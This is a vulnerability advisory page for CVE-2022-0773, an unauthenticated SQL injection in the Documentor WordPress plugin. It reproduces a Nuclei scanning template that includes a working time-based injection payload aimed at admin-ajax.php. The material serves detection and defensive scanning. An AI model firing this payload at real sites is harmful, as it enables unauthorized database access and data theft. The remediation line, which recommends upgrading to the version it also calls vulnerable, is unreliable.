CVE-2022-0773: Documentor <= 1.5.3 - Unauthenticated SQL Injection

日期: 2025-08-01 | 影响软件: Documentor | POC: 已公开

漏洞描述

The Documentor WordPress plugin through 1.5.3 fails to sanitize and escape user input before it is being interpolated in an SQL statement and then executed, leading to an SQL Injection exploitable by unauthenticated users.

PoC代码[已公开]

id: CVE-2022-0773

info:
  name: Documentor <= 1.5.3 - Unauthenticated SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    The Documentor WordPress plugin through 1.5.3 fails to sanitize and escape user input before it is being interpolated in an SQL statement and then executed, leading to an SQL Injection exploitable by unauthenticated users.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Update to Documentor version 1.5.3 or later to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/55b89de0-30ed-4f98-935e-51f069faf6fc
    - https://wordpress.org/plugins/documentor-lite/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0773
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0773
    cwe-id: CWE-89
    epss-score: 0.63237
    epss-percentile: 0.98349
    cpe: cpe:2.3:a:documentor_project:documentor:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: documentor_project
    product: documentor
    framework: wordpress
  tags: time-based-sqli,cve2022,cve,unauth,sqli,wp-plugin,wp,documentor-lite,wpscan,wordpress,documentor_project

http:
  - raw:
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=doc_search_results&term=&docid=1+AND+(SELECT+6288+FROM+(SELECT(SLEEP(6)))HRaz)
      - |
        GET /wp-content/plugins/documentor-lite/core/js/documentor.js HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=6'
          - 'status_code == 200'
          - 'contains(content_type_1, "text/html")'
          - 'contains(body_1, "([])") && contains(body_2, ".documentor-help")'
        condition: and
# digest: 4a0a00473045022059279957fb315a2e1587ce1c64c2bc65eea87860ab2133053d9a6d848824ad9b022100f9bad6e3c1df86451b471b43213cbf3364024cc83c982047b42c948267c00941:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-0773.yaml